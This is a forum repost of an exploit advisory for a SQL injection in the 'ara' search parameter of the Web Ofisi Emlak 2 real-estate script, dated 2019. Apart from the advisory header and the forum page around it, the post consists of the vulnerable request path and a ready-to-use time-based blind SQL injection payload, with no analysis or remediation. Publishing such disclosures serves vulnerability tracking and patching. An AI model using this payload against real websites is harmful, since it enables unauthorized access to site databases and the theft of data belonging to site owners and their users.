跳转到帖子

Web Ofisi Emlak 2 - 'ara' SQL Injection

recommended_posts

发布于
  • Members
# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
# Demo Site: http://demobul.net/emlakv2/
# Version: v2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/ara.html?ara=
Vulnerable Parameter: ara (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
            
  • 查看数 694
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…